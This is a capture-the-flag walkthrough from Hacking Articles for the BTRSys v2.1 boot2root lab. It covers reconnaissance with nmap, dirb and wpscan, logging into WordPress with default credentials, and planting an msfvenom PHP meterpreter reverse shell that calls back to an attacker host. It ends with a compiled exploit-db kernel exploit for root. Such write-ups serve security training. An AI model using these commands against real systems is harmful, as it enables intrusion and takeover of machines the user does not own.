Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

BTRSys is boot2root challenge developed by ‘ismailonderkaya’ in the series of BRTSys. This is an amazing lab for practice which has covered every technique.

Difficulty level: Intermediate

WalkThrough

Let’s start by finding our target. And for that use the following command.

netdiscover

We know our target is 192.168.0.106 so, therefore, apply nmap on it as it will help us know which ports and services are open. Use the following command:

nmap -A 192.168.0.106

Due to nmap you can see that port 21, 22 and 80 are open with the service of FTP, SSH and HTTP respectively. As we still have a lot to find about this, we decided to use DIRB. Dirb is web-scanner i.e. it will scan the whole web application for file/directories. It will even show the hidden files. Use the following command:

dirb http://192.168.0.106

As you can see in the above image that using dirb we found various files and directories such as robots.txt, upload, etc. but you can also see that our target web application is using wordpress, so, we can easily apply a wordpress scan using the following command which covers themes, plugins and users:

./wpscan.rb -u http://192.168.0.106/wordpress/ –enumerate at –enumerate ap –enumerate u

As a result we have found two users – btrisk and admin.

Now if you try to login through admin using password admin you have the access of the dashboard. And once you have that access you can execute a malicious PHP code there in to have a meterpreter session. Use the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

The above command will give you a php code which you have to execute. Copy the code from <?php to die(); and paste it in the template as shown below :

Once the code is uploaded, execute it through URL as shown :

192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Before executing the above URL, make sure that your meterpreter handler is active. And to do so; go to Metasploit and type the following:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 444

exploit

Once the handler is active and url is executed, you will have your session. Let’s check the system’s information which we have entered and for this type:

sysinfo

Now let’s get into shell by simply typing:

shell

Through shell we came to know that Ubuntu’s version is 16.04.2 and fortunately there is exploit in exploit-db for this version of ubuntu. Download this exploit.

This exploit will help you to have achieve privilege escalation so that you can directly access root. Once the exploit is downloaded, we need to compile it and for that type:

gcc 41458.c -o rootshell

Now that the exploit has been compiled, upload it in the /tmp directory. For that you will need to go to /tmp directory. Use the following commands:

cd /tmp

upload /root/Desktop/rootshell

Now got o shell>/tmp and give the permission to the exploit rootshell and the execute it. Use the following commands:

shell

cd /tmp

chmod 777 rootshell

./rootshell

And to confirm use the following command:

whoami

HURRAY!!!! We are in the root. And so our Boot2Root challenge is complete.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

 

Leave a Reply

Your email address will not be published. Required fields are marked *